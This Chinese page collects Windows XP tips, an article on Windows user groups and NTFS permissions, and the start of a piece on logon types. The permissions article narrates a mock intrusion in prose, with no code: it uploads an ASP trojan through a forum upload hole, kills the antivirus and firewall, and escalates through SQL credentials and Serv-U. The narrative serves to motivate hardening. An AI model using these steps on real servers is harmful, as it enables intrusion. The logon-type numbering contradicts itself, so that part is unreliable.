许多程序在安装过程中都要求你具备管理权限。这里介绍了一种以普通用户身份登录的情况下，临时为自己分配管理权限的简单方法。在右键单击程序安装文件的同时按住“Shift”键。在随后出现的快捷菜单中单击“运行方式”，输入具有相应管理权限的用户名和密码。这种方式对于开始菜单上的应用程序同样适用。 12、如何关闭Windows XP的自动播放功能 一旦你将多媒体光盘插入驱动器，自动运行就会从驱动器中读取数据，这会造成程序的设置文件和在音频媒体上的音乐立即开始。你可以用下面这个办法关闭这个功能:打开“开始?运行”，在对话框中输入“gpedit.msc”命令，在出现“组策略”窗口中依次选择“在计算机配置?管理模板?系统”，双击“关闭自动播放”，在“设置”选项卡中选“已启用”选项，最后单击“确定”按钮即可。 13、如何恢复被破坏的系统引导文件 现象:我只安装了Windows XP系统，但在开机时显示“BOOT.INI非法，正从C:WINDOWS启动”，然后就进入了启动状态，并且也能照样工作，请问这是怎么一回事，能否在不重装系统的情况下使系统恢复到正常启动状态? 出现这种情况是因为C盘下面的“Boot.ini”文件被破坏了。但是由于你的机器中只有一个操作系统，当然它就是默认的操作系统，即使“Boot.ini”文件被破坏了，也将自动地引导该系统进行装载。 解决的办法是建立一个“Boot.ini”文件即可。其内容为: [Boot Loader] Default=C: [Operating Systems] C:=“Microsoft Windows xp” 14、如何恢复输入法图标 现象:本人使用Windows XP中文版，不慎使任务栏隐藏了输入法图标，请问该如何恢复输入法图标。 打开“控制面板”，双击“区域和语言选项”图标，进入“区域和语言选项”对话框，选择“语言”选项卡，单击“详细信息”按钮，在弹出的对话框中单击“语言栏”按钮，在接着出现的“语言栏设置”对话框中勾选“在桌面上显示语言栏”选项。这时候桌面会出现语言栏，单击右上角的最小化按钮，输入法图标就回到任务栏中去了。 15、如何恢复误删除的boot.ini文件 现象:我第一次装Windows XP时，重启后没有任何问题。但是由于误操作，删掉了C盘目录下的一个文件(文件名是:boot.ini)，然后再重启时每次都显示两行字:“boot.ini是非法的。现在正从C:/Windows/下启动”。然后可以顺利进入Windows XP。但是速度明显慢了，比没删这个文件时慢了很多，而且，每次都要看见那两行字。请问如何修复, boot.ini是系统启动时，需要查询的一个系统文件，它告诉启动程序本计算机有几个操作系统、各系统的位置在哪里等信息。重新恢复的方法如下:单击“开始”菜单，依次指向“程序?附件?记事本”，打开“记事本”，在记事本里输入: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) Windows [operating systems] multi(0)disk(0)rdisk(0)partition(1)Windows=“Microsoft Windows XP Professional” /fastdetect 然后将它保存为名字是boot.ini的文件，并将此文件保存到C盘的根目录下即可。 16、如何加快Windows XP窗口显示速度 我们可以通过修改注册表来改变窗口从任务栏弹出，以及最小化回归任务栏的动作，步骤如下:打开注册表编辑器，找到HKEY_ CURRENT_USERControl PanelDesktop WindowMetrics子键分支，在右边的窗口中找到MinAnimate键值，其类型为REG_SZ，默认情况下此健值的值为1，表示打开窗口显示的动画，把它改为0，则禁止动画的显示，接下来从开始菜单中选择“注销”命令，激活刚才所作的修改即可。 17、如何解决Windows XP关机出现英文提示 现象:我的Windows XP关机时会出现一个进度条，并提示“To return to windows and check the status of the program click cancel if you choose to end the program immediately you will lose any unsaved data. To end the program now click end.”然后就正常关机，但有时却不出现，我想会不会与我的东方 影都3的记忆播放有关，但关闭记忆播放功能也无效，请问如何办, 这是因为你关闭Windows XP时还有程序在运行，请在关机之前保存并关闭一切应用程序。如果直接单击“End”按钮，那么未保存的任务会丢失，这时可以按“Ctrl+Alt+Del”打开任务管理器，然后关闭应用程序。如果在任务管理器列表中为空，那么就在“系统进程”中将它关闭。如果不进行任何操作，那么系统将在进度条到头时自动关闭未关闭的程序并关闭系统。请你在关机之前关闭一切应用程序、系统驻留程序就不会出现这个提示了。当你确定没有任何需要保存的任务时，可以不必理会此对话框。 18、如何控制桌面的图标显示 通常很多用户还是习惯于在桌面上保留“我的文档”及其他经常访问文件夹快捷方式以及经常使用的程序快捷方式。如果你想在桌面上显示“我的电脑”、“我的文档”、“网上邻居”、IE浏览器的快捷方式图标，只需进行如下操作 :在桌面单击鼠标右键，在右键菜单中选择“属性”命令，在打开的“显示 属性”对话框中选择“桌面”选项卡，单击“自定义桌面”按钮，打开“桌面”项目对话框。在“常规”选项卡的“桌面图标”栏中选择所需项目的复选框，然后单击“确定”返回上一级对话框，再单击“应用”按钮即可。 19、如何删除Windows XP的“更新”选项 对于大多数的用户来说，Windows XP的Windows Update功能似乎作用不大，我们可以去掉它，操作步骤如下:打开注册表编辑器，找到HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVersionPoliciesExplorer子键分支，选择“编辑”菜单下的“新建”命令，新建一个类型为REG_DWord的值，名称为NoCommonGroups，双击新建的NoCommon Groups子键，在“编辑字符串”文本框中输入键值“1”，然后单击“确定”按钮并重新启动系统即可。 20、如何设置音频属性 打开“控制面板”，双击“声音及音频设备”图标，在“声音及音频设备 属性”对话框中，选择“音频”选项卡，在该选项卡中，你可以看到与“声音播放”、“录音”和“MIDI音乐播放”有关的默认设备。当你的计算机上安装有多个音频设备时，就可以在这里选择应用的默认设备，并且还可以调节其音量及进行高级设置。 进行音频设置的操作步骤如下: (1)在“声音播放”选项组中，从“默认设备”下拉列表中选择声音播放的首选设备，一般使用系统默认设备。 (2)用户如果希望调整声音播放的音量，可以单击“音量控制”窗口，在该窗口中，将音量控制滑块上下拖动即可调整音量大小。 (3)在该窗口中，用户可以为不同的设备设置音量。例如，当用户在播放CD时，调节“CD音频”选项组中的音量控制滑块，可以改变播放CD的音量;当用户播放MP3和WAV等文件时，用户还可以在“音量控制”窗口进行左右声道的平衡、静音等设置。 (4)用户如果想选择扬声器或设置系统的播放性能，可以单击“声音播放”选项组中的“高级”按钮，打开 “高级音频属性”对话框，在“扬声器”和“性能”选项卡可以分别为自己的多媒体系统设定最接近你的硬件配置的扬声器模式及调节音频播放的硬件加速功能和采样率转换质量。 (5)在“录音”选项组中，可以从“默认设备”下拉列表中选择录音默认设备。单击“音量”按钮，打开 “录音控制”对话窗口。用户可以在该窗口中改变录音左右声道的平衡状态以及录音的音量大小 (6)在“MIDI音乐播放”选项组中，从“默认设备”下拉列表中选择 MIDI音乐播放默认设备。单击“音 量”按钮，打开“音量控制”窗口调整音量大小。 (7)如果用户使用默认设备工作，可启用“仅使用默认设备”复选框。设置完毕后，单击“应用”按钮保存设置。 22、如何手动使计算机进入休眠状态 现象:请问如何用手动方式使Windows XP的计算机进入休眠状态, 休眠功能是Windows XP提供的一项非常酷的特性，它“隐藏”在Shut Down(关机)对话框中。如果你的计算机支持休眠功能，那么借助以下技巧，可通过手动方式使其进入休眠状态。 如需以手动方式使你的计算机进入休眠状态，请执行以下操作步骤: 选择“开始?关闭计算机”，在关闭Windows对话框中，选择“休眠”。当你的计算机进入休眠状态后，内存中的内容将保存到硬盘上。当你将计算机唤醒时，进入休眠状态前打开的所有程序与文档都将恢复到桌面上。如需在你的计算机上激活休眠支持特性，请执行以下操作步骤:你必须以管理员、Administrators或Power Users组成员的身份登录。如果你的计算机与某个网络建立了连接，那么网络策略设置可能会导致这一操作过程无法实现。单击“开始?控制面板?性能和维护?电源选项”，选择“休眠”选项卡，选中“启用休眠”，单击“确定”关闭电源选项对话框。如果休眠选项卡不可用，则说明你的硬件设备无法支持该特性。 23、如何提高Windows XP的启动速度 使用微软提供的“Bootvis”软件可以有效地提高Windows XP的启动速度。这个工具是微软内部提供的，专门用于提升Windows XP启动速度。下载解压缩到一个文件夹下，并在“Options”选项中设置使用当前路径。之后从“Trace”选项下拉菜单中选择跟踪方式。该程序会引导Windows XP重新启动，并记录启动进程，生成相关的BIN文件。之后从Bootvis中调用这个文件，从Trace项下拉菜单中选择“Op-timizesystem”命令即可。 Windows XP虽然提供了一个非常好的界面外观，但这样的设置也在极大程度上影响了系统的运行速度。如果你的电脑运行起来速度不是很快，建议将所有的附加桌面设置取消，也就是将Windows XP的桌面恢复到Windows 2000样式。 设置的方法非常简单:在“我的电脑”上单击鼠标右键，选择“属性”，在“高级”选项卡中单击“性能”项中的“设置”按钮，在关联界面中选择“调整为最佳性能”复选框即可。 此外，一个对Windows XP影响重大的硬件就是内存。使用256MB内存运行Windows XP会比较流畅，512MB的内存可以让系统运行得很好。如果条件允许，最好增大内存。 24、如何为Windows XP减肥 Windows XP比以往的任何Windows系统都要庞大，其硬盘空间需求1.5GB。虽然相对于能跑Windows XP的主流电脑来说，一般都拥有10GB以上的硬盘，但一些电脑发烧友有时还是乐于减少Windows XP的体积。 (1)删除驱动备份 :WindowsDriver cachei386目录下的Driver.cab文件(73MB) 。 (2)删除Help文档(减掉40多MB) 。 (3)删除WindowsIme下不用的输入法(日文、韩文、约80MB) 。 (4)把我的文件、IE的临时文件夹转到其他硬盘(分区) 。 (5)把虚拟内存转到其他硬盘(分区)。 25、如何卸载Windows XP 现象:我原来使用的操作系统是Windows 98，最近听说Windows XP非常好，就安装了该系统。第一次安装是从Windows 98中安装，装完后觉得不太好，就格式化Windows XP的分区后重新从DOS安装到D盘，安装完后发现多重启动菜单有三项(第一次装的Windows XP那一项还在)，请问如何删除多余的一项,另外，如果我要删除Windows XP，除了格式化D盘外，怎样才能将它彻底删除, Windows 98和Windows XP双系统的启动菜单是由C盘根目录下的一个文件来控制的，通过修改该文件可以更改启动菜单。要想删除多余的Windows XP项目，你可以打开C盘根目录下的boot.ini文件，其中有两行重复的“multi(0)„”，删除其中一行即可。要想彻底删除Windows XP，除了格式化它所在分区之外，你还必须按下面的方法删除多重启动菜单和多余的系统文件: (1)制作一张Windows 98启动盘，并将Windows 98下的sys.com文件拷入该系统盘。 (2)用该启动盘启动，在A:>下执行sys C:命令。 (3)删除C盘根目录下多余的文件，这些文件包括:boot.ini、bootfont.bin、bootsect.dos、ntdetect.com、pagefile.sys等。 26、如何隐藏桌面图标 在Windows XP中增加了隐藏桌面图标的功能，你只需用鼠标单击桌面空白处，在弹出的右键菜单中选定“排列图标”命令，然后在其下一级级联菜单中取消对“显示桌面图标”命令的选定，系统就会自动将所有桌面图标隐藏。 如果桌面上图标数量较多，可以用以下方法重新排列图标 :在桌面空白区域单击鼠标右键，在弹出菜 单中选择“排列图标”，然后在下一级菜单中单击图标排列规则即可。 利用Windows XP的“桌面清理”功能，可将你桌面上不使用的图标清理掉。方法是:在上面的“桌面”项目对话框的“常规”选项卡中，如果你选中“每60天运行桌面清理向导”复选框，系统就会每60天自动运行一次桌面清理向导，帮你清理掉桌面上不使用的图标。如果你单击“现在清理桌面”按钮，则系统会立即打开桌面清理向导，将你不使用的快捷方式图标移到一个名为“未使用的桌面快捷方式”的桌面文件夹中。该向导不移动、更改和删除任何程序，如果你想将某个图标重新移回桌面，可以从“未使用的桌面快捷方式”的桌面文件夹中将其还原。 27、如何在Windows XP中进行繁体字输入 使用微软拼音3.0可以进行繁体字输入，你可在系统中选择微软拼音输入法，单击“选项”并在其中选中简、繁转换项，这时输入法状态条中就会有简、繁转换按钮，需要使用它切换即可进行繁体字输入了。 当然还有其它更多的方法，就不再一一详述了。 28、如何找回两台电脑相连图标 现象:我的电脑装的是Windows XP，在上网时系统托盘内的两台电脑相连的小图标不见了，使我经常不知道是否在线。请问应如何将它恢复, 小图标不见了的原因在于网络连接的属性设置不对。在Windows 98中拨号连接上互联网后，该连接的小图标将自动显示在任务栏上。如果小图标不见了，可右击“我的连接”，选择“属性?设置?选项”，选中“显示调制解调器状态”即可恢复。在Windows 2000和Windows XP中，用户可以控制和设置连接图标的显示和隐藏功能。具体的方法是打开拨号连接或者网络连接的“属性”对话框，然后选中或者清除“连接后在通知区域显示图标”复选框，就可以实现该图标的显示或隐藏了。 29、如何制作自动系统恢复软盘 现象:我在Windows XP下未找到制作紧急修复磁盘的界面，请问如何制作,另外我的Windows 98每次启动时都提示输入用户名与密码，请问如何消除, Windows XP的紧急修复磁盘准确的名称应该是“自动系统恢复(ASR) 软盘”，它可以备份那些启动系统所需的系统文件。制作方法是:单击“开始?所有程序?附件?系统工具”，然后单击“备份”，单击备份工具向导中的“高级模式”按钮。在“工具”菜单上，单击“ASR 向导”;然后按照屏幕上的提示进行操作即可(注意 :事先应准备好保存系统设置的1.44MB的空软盘)。使用方法也很简单:将Windows XP系统的安装光盘插入CD驱动器中，重新启动计算机。在出现安装界面时，按F2，系统将提示你插入以前创建的ASR软盘(ASR不会还原数据文件)。请按照屏幕上的向导进行操作即可自动恢复系统。另外，即使没有 “自动系统恢复(ASR) 软盘”，也可以使用“修复”功能恢复Windows XP系统引导菜单，只是某些个人的特殊设置会被恢复成默认设置，使用“自动系统恢复(ASR) 软盘”则不会。 Windows 98每次启动时都提示输入用户名与密码，可以按“Esc”键进入Windows 98桌面，这时可以将Windows目录下的密码文件*(pwl删除。例如用户名为“qq”，相应的密码文件就是“qq(pwl”，找到它并删除它，然后重新启动电脑，在出现登录窗口时输入原来的用户名“qq”，密码不填，这样就可以消除了。 30、如何自动关闭停止响应的程序 在Windows XP操作系统中，这个设置可以使Windows XP当诊测到某个应用程序已经停止响应时可以自动关闭它，而不需要进行麻烦的手工干预。想要实现这个功能，就请单击“开始?运行”输入“Regedit”打开注册表编辑器，找到HKEY_CURRENT_USERControl PanelDesktop分支，将Auto End Tasks的键值设置为1即可。 Windows操作系统六大用户组及系统帐户权限功能设置分析 2009-02-08 13:07:04 被30人转藏 | 小贴士:QQ秘籍训练营,用QQ懂QQ Windows操作系统六大用户组及系统帐户权限功能设置分析 在Windows系统中，用户名和密码对系统安全的影响毫无疑问是最重要。通过一定方式获得计算机用户名，然后再通过一定的方法获取用户名的密码，已经成为许多黑客的重要攻击方式。即使现在许多防火墙软件不端涌现，功能也逐步加强，但是通过获取用户名和密码的攻击方式仍然时有发生。其实通过加固Windows系统用户的权限，在一定程度上对安全有着很大的帮助。 Windows是一个支持多用户、多任务的操作系统，不同的用户在访问这台计算机时，将会有不同的权限。同时，对用户权限的设置也是是基于用户和进程而言的，Windows 里，用户被分成许多组，组和组之间都有不同的权限，并且一个组的用户和用户之间也可以有不同的权限。以下就是常见的用户组。 1.Users 普通用户组，这个组的用户无法进行有意或无意的改动。因此，用户可以运行经过验证的应用程序，但不可以运行大多数旧版应用程序。Users 组是最安全的组，因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料。Users 组提供了一个最安全的程序运行环境。在经过 NTFS 格式化的卷上，默认安全设置旨在禁止该组的成员危及操作系统和已安装程序的完整性。用户不能修改系统注册表设置、操作系统文件或程序文件。Users 可以创建本地组，但只能修改自己创建的本地组。Users 可以关闭工作站，但不能关闭服务器。 2.Power Users 高级用户组，Power Users 可以执行除了为 Administrators 组保留的任务外的其他任何操作系统任务。分配给 Power Users 组的默认权限允许 Power Users 组的成员修改整个计算机的设置。但Power Users 不具有将自己添加到 Administrators 组的权限。在权限设置中，这个组的权限是仅次于Administrators的。 3.Administrators 管理员组，默认情况下，Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制。一般来说，应该把系统管理员或者与其有着同样权限的用户设置为该组的成员。 4.Guests 来宾组，来宾组跟普通组Users的成员有同等访问权，但来宾账户的限制更多。 5.Everyone 所有的用户，这个计算机上的所有用户都属于这个组。 6.SYSTEM组 这个组拥有和Administrators一样甚至更高的权限，在察看用户组的时候它不会被显示出来，也不允许任何用户的加入。这个组主要是保证了系统服务的正常运行，赋予系统及系统服务的权限。 众所周知，Windows是一个支持多用户、多任务的操作系统，这是权限设置的基础，一切权限设置都是基于用户和进程而言的，不同的用户在访问这台计算机时，将会有不同的权限。 DOS跟WinNT的权限的分别 DOS是个单任务、单用户的操作系统。但是我们能说DOS没有权限吗?不能!当我们打开一台装有DOS操作系统的计算机的时候，我们就拥有了这个操作系统的管理员权限，而且，这个权限无处不在。所以，我们只能说DOS不支持权限的设置，不能说它没有权限。随着人们安全意识的提高，权限设置随着NTFS的发布诞生了。 Windows NT里，用户被分成许多组，组和组之间都有不同的权限，当然，一个组的用户和用户之间也可以有不同的权限。下面我们来谈谈NT中常见的用户组。 Administrators,管理员组，默认情况下，Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制。所以，只有受信任的人员才可成为该组的成员。 Power Users，高级用户组，Power Users 可以执行除了为 Administrators 组保留的任务外的其他任何操作系统任务。分配给 Power Users 组的默认权限允许 Power Users 组的成员修改整个计算机的设置。但Power Users 不具有将自己添加到 Administrators 组的权限。在权限设置中，这个组的权限是仅次于Administrators的。 Users:普通用户组，这个组的用户无法进行有意或无意的改动。因此，用户可以运行经过验证的应用程序，但不可以运行大多数旧版应用程序。Users 组是最安全的组，因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料。Users 组提供了一个最安全的程序运行环境。在经过 NTFS 格式化的卷上，默认安全设置旨在禁止该组的成员危及操作系统和已安装程序的完整性。用户不能修改系统注册表设置、操作系统文件或程序文件。Users 可以关闭工作站，但不能关闭服务器。Users 可以创建本地组，但只能修改自己创建的本地组。 Guests:来宾组，按默认值，来宾跟普通Users的成员有同等访问权，但来宾帐户的限制更多。 Everyone:顾名思义，所有的用户，这个计算机上的所有用户都属于这个组。 其实还有一个组也很常见，它拥有和Administrators一样、甚至比其还高的权限，但是这个组不允许任何用户的加入，在察看用户组的时候，它也不会被显示出来，它就是SYSTEM组。系统和系统级的服务正常运行所需要的权限都是靠它赋予的。由于该组只有这一个用户SYSTEM，也许把该组归为用户的行列更为贴切。 权限的权力大小分析 权限是有高低之分的，有高权限的用户可以对低权限的用户进行操作，但除了Administrators之外，其他组的用户不能访问 NTFS 卷上的其他用户资料，除非他们获得了这些用户的授权。而低权限的用户无法对高权限的用户进行任何操作。 我们平常使用计算机的过程当中不会感觉到有权限在阻挠你去做某件事情，这是因为我们在使用计算机的时候都用的是Administrators中的用户登陆的。这样有利也有弊，利当然是你能去做你想做的任何一件事情而不会遇到权限的限制。弊就是以 Administrators 组成员的身份运行计算机将使系统容易受到特洛伊木马、病毒及其他安全风险的威胁。访问 Internet 站点或打开电子邮件附件的简单行动都可能破坏系统。 不熟悉的 Internet 站点或电子邮件附件可能有特洛伊木马代码，这些代码可以下载到系统并被执行。如果以本地计算机的管理员身份登录，特洛伊木马可能使用管理访问权重新格式化您的硬盘，造成不可估量的损失，所以在没有必要的情况下，最好不用Administrators中的用户登陆。Administrators中有一个在系统安装时就创建的默认用户----Administrator，Administrator 帐户具有对服务器的完全控制权限，并可以根据需要向用户指派用户权利和访问控制权限。 因此强烈建议将此帐户设置为使用强密码。永远也不可以从Administrators 组删除 Administrator 帐户， 但可以重命名或禁用该帐户。由于大家都知道“管理员”存在于许多版本的 Windows 上，所以重命名或禁用此帐户将使恶意用户尝试并访问该帐户变得更为困难。对于一个好的服务器管理员来说，他们通常都会重命名或禁用此帐户。Guests用户组下，也有一个默认用户----Guest,但是在默认情况下，它是被禁用的。如果没有特别必要，无须启用此账户。 小帮助:何谓强密码?就是字母与数字、大小互相组合的大于8位的复杂密码，但这也不完全防得住众多的黑客，只是一定程度上较为难破解。 我们可以通过“控制面板”--“管理工具”--“计算机管理”--“用户和用户组”来查看用户组及该组下的用户。 我们用鼠标右键单击一个NTFS卷或NTFS卷下的一个目录，选择“属性”--“安全”就可以对一个卷，或者一个卷下面的目录进行权限设置，此时我们会看到以下七种权限:完全控制、修改、读取和运行、列出文件夹目录、读取、写入、和特别的权限。“完全控制”就是对此卷或目录拥有不受限制的完全访问。地位就像Administrators在所有组中的地位一样。选中了“完全控制”，下面的五项属性将被自动被选中。 “修改”则像Power users，选中了“修改”，下面的四项属性将被自动被选中。下面的任何一项没有被选中时，“修改”条件将不再成立。“读取和运行”就是允许读取和运行在这个卷或目录下的任何文件，“列出文件夹目录”和“读取”是“读取和运行”的必要条件。 “列出文件夹目录”是指只能浏览该卷或目录下的子目录，不能读取，也不能运行。“读取”是能够读取该卷或目录下的数据。“写入”就是能往该卷或目录下写入数据。而“特别”则是对以上的六种权限进行了细分。读者可以自行对“特别”进行更深的研究，鄙人在此就不过多赘述了。 一台简单服务器的设置实例操作: 下面我们对一台刚刚安装好操作系统和服务软件的WEB服务器系统和其权限进行全面的刨析。服务器采用Windows 2000 Server版，安装好了SP4及各种补丁。WEB服务软件则是用了Windows 2000自带的IIS 5.0，删除了一切不必要的映射。整个硬盘分为四个NTFS卷，C盘为系统卷，只安装了系统和驱动程序;D盘为软件卷，该服务器上所有安装的软件都在D盘中;E盘是WEB程序卷，网站程序都在该卷下的WWW目录中;F盘是网站数据卷，网站系统调用的所有数据都存放在该卷的WWWDATABASE目录下。 这样的分类还算是比较符合一台安全服务器的标准了。希望各个新手管理员能合理给你的服务器数据进行分类，这样不光是查找起来方便，更重要的是这样大大的增强了服务器的安全性，因为我们可以根据需要给每个卷或者每个目录都设置不同的权限，一旦发生了网络安全事故，也可以把损失降到最低。 当然，也可以把网站的数据分布在不同的服务器上，使之成为一个服务器群，每个服务器都拥有不同的用户名和密码并提供不同的服务，这样做的安全性更高。不过愿意这样做的人都有一个特点----有钱。 好了，言归正传，该服务器的数据库为MS-SQL，MS-SQL的服务软件SQL2000安装在d:\ms-sqlserver2K目录下，给SA账户设置好了足够强度的密码，安装好了SP3补丁。为了方便网页制作员对网页进行管理，该网站还开通了FTP服务，FTP服务软件使用的是SERV-U 5.1.0.0，安装在d:\ftpservice\serv-u目录下。杀毒软件和防火墙用的分别是Norton Antivirus和BlackICE,路径分别为d:\nortonAV和d:\firewall\blackice,病毒库已经升级到最新，防火墙规则库定义只有80端口和21端口对外开放。网站 的内容是采用动网7.0的论坛,网站程序在e:\www\bbs下。 细心的读者可能已经注意到了，安装这些服务软件的路径我都没有采用默认的路径或者是仅仅更改盘符的默认路径，这也是安全上的需要，因为一个黑客如果通过某些途径进入了你的服务器，但并没有获得管理员权限，他首先做的事情将是查看你开放了哪些服务以及安装了哪些软件，因为他需要通过这些来提升他的权限。 一个难以猜解的路径加上好的权限设置将把他阻挡在外。相信经过这样配置的WEB服务器已经足够抵挡大部分学艺不精的黑客了。读者可能又会问了:“这根本没用到权限设置嘛!我把其他都安全工作都做好了，权限设置还有必要吗?”当然有!智者千虑还必有一失呢，就算你现在已经把系统安全做的完美无缺，你也要知道新的安全漏洞总是在被不断的发现。 权限实例攻击 权限将是你的最后一道防线!那我们现在就来对这台没有经过任何权限设置，全部采用Windows默认权限的服务器进行一次模拟攻击，看看其是否真的固若金汤。 假设服务器外网域名为，用扫描软件对其进行扫描后发现开放WWW和FTP服务，并发现其服务软件使用的是IIS 5.0和Serv-u 5.1，用一些针对他们的溢出工具后发现无效，遂放弃直接远程溢出的想法。 打开网站页面，发现使用的是动网的论坛系统，于是在其域名后面加个/upfile.asp，发现有文件上传漏洞，便抓包，把修改过的ASP木马用NC提交，提示上传成功，成功得到WEBSHELL，打开刚刚上传的ASP木马，发现有MS-SQL、Norton Antivirus和BlackICE在运行，判断是防火墙上做了限制，把SQL服务端口屏蔽了。 通过ASP木马查看到了Norton Antivirus和BlackICE的PID，又通过ASP木马上传了一个能杀掉进程的文件，运行后杀掉了Norton Antivirus和BlackICE。再扫描，发现1433端口开放了，到此，便有很多种途径获得管理员权限了，可以查看网站目录下的conn.asp得到SQL的用户名密码，再登陆进SQL执行添加用户，提管理员权限。也可以抓SERV-U下的ServUDaemon.ini修改后上传，得到系统管理员权限。 还可以传本地溢出SERV-U的工具直接添加用户到Administrators等等。大家可以看到，一旦黑客找到了切入点，在没有权限限制的情况下，黑客将一帆风顺的取得管理员权限。 那我们现在就来看看Windows 2000的默认权限设置到底是怎样的。对于各个卷的根目录，默认给了Everyone组完全控制权。这意味着任何进入电脑的用户将不受限制的在这些根目录中为所欲为。 系统卷下有三个目录比较特殊，系统默认给了他们有限制的权限，这三个目录是Documents and settings、Program files和Winnt。对于Documents and settings，默认的权限是这样分配的:Administrators拥有完全控制权;Everyone拥有读&运，列和读权限ower users拥有读&运，列和读权限;SYSTEM同Administrators;Users拥有读&运，列和读权限。对于Program files，Administrators拥有完全控制权;Creator owner拥有特殊权限ower users有完全控制权;SYSTEM同Administrators;Terminal server users拥有完全控制权，Users有读&运，列和读权限。 对于Winnt，Administrators拥有完全控制权;Creator owner拥有特殊权限ower users有完全控制 权;SYSTEM同Administrators;Users有读&运，列和读权限。而非系统卷下的所有目录都将继承其父目录的权限，也就是Everyone组完全控制权! 现在大家知道为什么我们刚刚在测试的时候能一帆风顺的取得管理员权限了吧?权限设置的太低了!一个人在访问网站的时候，将被自动赋予IUSR用户，它是隶属于Guest组的。本来权限不高，但是系统默认给的Everyone组完全控制权却让它“身价倍增”，到最后能得到Administrators了。 那么，怎样设置权限给这台WEB服务器才算是安全的呢?大家要牢记一句话:“最少的服务+最小的权限=最大的安全”对于服务，不必要的话一定不要装，要知道服务的运行是SYSTEM级的哦，对于权限，本着够用就好的原则分配就是了。 对于WEB服务器，就拿刚刚那台服务器来说，我是这样设置权限的，大家可以参考一下:各个卷的根目录、Documents and settings以及Program files，只给Administrator完全控制权，或者干脆直接把Program files给删除掉;给系统卷的根目录多加一个Everyone的读、写权;给e:\www目录，也就是网站目录读、写权。 最后，还要把cmd.exe这个文件给挖出来，只给Administrator完全控制权。经过这样的设置后，再想通过我刚刚的方法入侵这台服务器就是不可能完成的任务了。可能这时候又有读者会问:“为什么要给系统卷的根目录一个Everyone的读、写权?网站中的ASP文件运行不需要运行权限吗?”问的好，有深度。是这样的，系统卷如果不给Everyone的读、写权的话，启动计算机的时候，计算机会报错，而且会提示虚拟内存不足。 当然这也有个前提----虚拟内存是分配在系统盘的，如果把虚拟内存分配在其他卷上，那你就要给那个卷Everyone的读、写权。ASP文件的运行方式是在服务器上执行，只把执行的结果传回最终用户的浏览器，这没错，但ASP文件不是系统意义上的可执行文件，它是由WEB服务的提供者----IIS来解释执行的，所以它的执行并不需要运行的权限。 深入了解权限背后的意义 经过上面的讲解以后，你一定对权限有了一个初步了了解了吧?想更深入的了解权限，那么权限的一些特性你就不能不知道了，权限是具有继承性、累加性 、优先性、交叉性的。 继承性是说下级的目录在没有经过重新设置之前，是拥有上一级目录权限设置的。这里还有一种情况要说明一下，在分区内复制目录或文件的时候，复制过去的目录和文件将拥有它现在所处位置的上一级目录权限设置。但在分区内移动目录或文件的时候，移动过去的目录和文件将拥有它原先的权限设置。 累加是说如一个组GROUP1中有两个用户USER1、USER2，他们同时对某文件或目录的访问权限分别为“读取”和“写入”，那么组GROUP1对该文件或目录的访问权限就为USER1和USER2的访问权限之和，实际上是取其最大的那个，即“读取”+“写入”=“写入”。 又如一个用户USER1同属于组GROUP1和GROUP2，而GROUP1对某一文件或目录的访问权限为“只读”型的，而GROUP2对这一文件或文件夹的访问权限为“完全控制”型的，则用户USER1对该文件或文件夹的访问权限为两个组权限累加所得，即:“只读”+“完全控制”=“完全控制”。 优先性，权限的这一特性又包含两种子特性，其一是文件的访问权限优先目录的权限，也就是说文件权限 可以越过目录的权限，不顾上一级文件夹的设置。另一特性就是“拒绝”权限优先其它权限，也就是说“拒绝”权限可以越过其它所有其它权限，一旦选择了“拒绝”权限，则其它权限也就不能取任何作用，相当于没有设置。 交叉性是指当同一文件夹在为某一用户设置了共享权限的同时又为用户设置了该文件夹的访问权限，且所设权限不一致时，它的取舍原则是取两个权限的交集，也即最严格、最小的那种权限。如目录A为用户USER1设置的共享权限为“只读”，同时目录A为用户USER1设置的访问权限为“完全控制”，那用户USER1的最终访问权限为“只读”。 权限设置的问题我就说到这了，在最后我还想给各位读者提醒一下，权限的设置必须在NTFS分区中才能实现的，FAT32是不支持权限设置的。同时还想给各位管理员们一些建议: 1.养成良好的习惯，给服务器硬盘分区的时候分类明确些，在不使用服务器的时候将服务器锁定，经常更新各种补丁和升级杀毒软件。 2.设置足够强度的密码，这是老生常谈了，但总有管理员设置弱密码甚至空密码。 3.尽量不要把各种软件安装在默认的路径下 4.在英文水平不是问题的情况下，尽量安装英文版操作系统。 5.切忌在服务器上乱装软件或不必要的服务。 6.牢记:没有永远安全的系统，经常更新你的知识。 Windows登录类型的分类 2009-02-08 13:06:15 被16人转藏 | 小贴士:想知道口袋那么多用户都在做什么么, 如果你留意Windows系统的安全日志，在那些事件描述中你将会发现里面的“登录类型”并非全部相同，难道除了在键盘上进行交互式登录(登录类型1)之外还有其它类型吗,不错，Windows为了让你从日志中获得更多有价值的信息，它细分了很多种登录类型，以便让你区分登录者到底是从本地登录，还是从网络登录，以及其它更多的登录方式。因为了解了这些登录方式，将有助于你从事件日志中发现可疑的黑客行为，并能够判断其攻击方式。下面我们就来详细地看看Windows的登录类型。 登录类型1:交互式登录(Interactive) 这应该是你最先想到的登录方式吧，所谓交互式登录就是指用户在计算机的控制台上进行的登录，也就是在本地键盘上进行的登录，但不要忘记通过KVM登录仍然属于交互式登录，虽然它是基于网络的。 登录类型2:网络(Network) 当你从网络的上访问一台计算机时在大多数情况下Windows记为类型3，最常见的情况就是连接到共享文件夹或者共享打印机时。另外大多数情况下通过网络登录IIS时也被记为这种类型，但基本验证方式的IIS登录是个例外，它将被记为类型8，下面将讲述。 登录类型3:批处理(Batch) 当Windows运行一个计划任务时，“计划任务服务”将为这个任务首先创建一个新的登录会话以便它能在此计划任务所配置的用户账户下运行，当这种登录出现时，Windows在日志中记为类型4，对于其它类型的工作任务系统，依赖于它的设计，也可以在开始工作时产生类型4的登录事件，类型4登录通常表明某计划任务启动，但也可能是一个恶意用户通过计划任务来猜测用户密码，这种尝试将产生一个类型4的登录失败事件，但是这种失败登录也可能是由于计划任务的用户密码没能同步更改造成的，比如用户密码更改了，而忘记了在计划任务中进行更改。 登录类型4:服务(Service) 